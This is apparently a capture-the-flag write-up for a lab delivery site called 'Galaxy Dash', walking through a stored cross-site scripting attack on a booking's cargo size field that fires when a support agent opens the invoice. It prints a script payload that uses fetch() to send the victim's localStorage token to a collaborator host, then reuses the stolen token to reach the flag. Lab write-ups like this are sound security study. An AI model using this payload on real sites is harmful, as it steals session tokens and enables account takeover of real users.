Galaxy Dash - XSS

Our favorite galaxy delivery site is back!

I spend a lot of time looking for the right answer, and I'm not gonna write down everything that didn't work, but I quickly gonna go over the intended path today.

The beginning of the attack path is when we confirm a booking

We need to intercept this traffic and in the cargo size property we need to add our payload. The payload I used was

<script>fetch('http://collab?token=' + encodeURIComponent(localStorage.getItem('token')));</script>

Now we have that payload, we just have to make sure someone opens up the message 😉

We do this by requesting support for that delivery.

Once we clicked that, we can request support for our invoice.

Whenever someone of importance than opens up our invoice, the payload is triggered and we get a response in our collaborator.

When we grab that token, and inject it into our localStorage, we can see that we changed our 'company'

When we now return to BurpSuite and inspect the traffic.

And in the headers, we can see our flag 🇧🇪